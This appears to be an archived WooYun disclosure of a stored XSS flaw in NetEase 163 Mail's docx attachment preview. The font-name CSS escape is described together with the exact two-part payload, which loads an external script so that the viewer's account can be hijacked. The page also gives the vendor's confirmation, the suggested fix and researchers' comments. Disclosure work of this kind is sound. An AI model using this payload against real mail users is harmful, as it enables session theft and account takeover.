当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088924

漏洞标题:163邮箱存储型XSS 可劫持他人账号进入对方邮箱

相关厂商:网易

漏洞作者: 0x_Jin

提交时间:2014-12-27 14:57

修复时间:2015-02-10 14:58

公开时间:2015-02-10 14:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2015-01-09: 细节向核心白帽子及相关领域专家公开
2015-01-19: 细节向普通白帽子公开
2015-01-29: 细节向实习白帽子公开
2015-02-10: 细节向公众公开

简要描述:

一步两步 一步两步

详细说明:

首先问题出在附件预览那(现在邮箱正文的过滤都过滤的差不多了),附件预览那如果预览doc docx这种类型的文件 便会采用微软的在线预览技术(高清版)以及永中软件的预览技术(极速版)
而微软的在线预览技术采用的是将内容嵌入到图片 然后来渲染出一张图片给用户看,这样是比较需要时间以及带宽来加载的(难怪叫高清版)
但是永中软件的就相对正常一些了,是获得内容然后渲染到html,这样速度比较快,带宽也无需太多 就跟浏览网页一样。
那么现在问题来了,微软的在线预览技术应该做的比较成熟了 所以直接放弃,那另外一个呢?
发送一个docx 然后预览发现字体是会输出在style标签中的字体css中的。
如果在字体中带上恶意payload呢?
其实是会过滤的,如果直接闭合style标签会变成这样:
</style><script> --->\60;/style\62;\60;script\62;
把payload当成值给编码了,这样就过不去了么,No 好玩的来了。
我们只需要有一个 ; 号 来结束掉 font-family 就ok了。
那么便可以这样:
}</style><script> 这样的话 } 会编码成font-family:\125;这样我们就有了个;号 然后便可以写payload了
最终payload如下 (由于字数问题 分成了两段):
}</style><script src=//km3pw>
}</script>
把上面的两段设置到word文档中的字体里就好了
比如 1.xsss --> 字体等于}</style><script src=//km3pw>
2.csrf --> 字体等于}</script>

QQ20141227-2.jpg


QQ20141227-3.jpg


然后发送给别人预览:

QQ20141227-8.jpg


漏洞证明:

QQ20141227-8.jpg

修复方案:

过滤危险字符 关键cookie字段加上httponly

版权声明:转载请注明来源 0x_Jin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-12-30 12:17

厂商回复:

感谢您对网易的关注。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-27 15:11 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    摩擦 摩擦

  2. 2014-12-27 15:12 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    摩擦 摩擦

  3. 2014-12-27 16:13 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。126 163 这些用的都是一样的东西,有必要发2个么。诶,被你发出来了,估计以后网易的cookie也就用不了了

  4. 2015-01-19 15:43 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    躺枪了,和qq的一样躺枪

  5. 2015-01-30 18:23 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    为何不测试微软的呢~~

  6. 2015-01-30 20:06 | 0x_Jin ( 普通白帽子 | Rank:319 漏洞数:37 | 微博:http://weibo.com/J1n9999)

    @mango 微软的做的很噁心 你去试试吧 我觉得微软的那个在线文档预览应该也会有些问题 但是思路应该换一个 他是会把你的内容给转换成类似于图片的东西给你预览 而不是直接的web page

  7. 2015-06-09 14:20 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @mango 微软 雅虎 gmail 这招早没用了。12年的时候 这招还可以干雅虎